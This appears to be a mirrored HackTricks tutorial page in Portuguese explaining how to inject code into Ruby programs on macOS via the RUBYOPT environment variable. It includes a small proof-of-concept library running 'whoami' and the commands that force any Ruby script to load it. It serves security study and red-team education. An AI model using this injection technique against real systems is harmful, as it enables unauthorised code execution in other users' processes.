mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 13:43:24 +00:00
3.2 KiB
3.2 KiB
Injeção em Aplicações Ruby no macOS
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Participe do grupo 💬 Discord ou do grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud no github.
RUBYOPT
Usando esta variável de ambiente, é possível adicionar novos parâmetros ao ruby sempre que ele for executado. Embora o parâmetro -e não possa ser usado para especificar código ruby a ser executado, é possível usar os parâmetros -I e -r para adicionar uma nova pasta ao caminho de bibliotecas a serem carregadas e, em seguida, especificar uma biblioteca para carregar.
Crie a biblioteca inject.rb em /tmp:
{% code title="inject.rb" %}
puts `whoami`
{% endcode %}
Crie em qualquer lugar um script ruby como:
{% code title="hello.rb" %}
puts 'Hello, World!'
Então faça um script ruby arbitrário carregá-lo com:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Fato curioso, isso funciona até com o parâmetro --disable-rubyopt:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub HackTricks e HackTricks Cloud.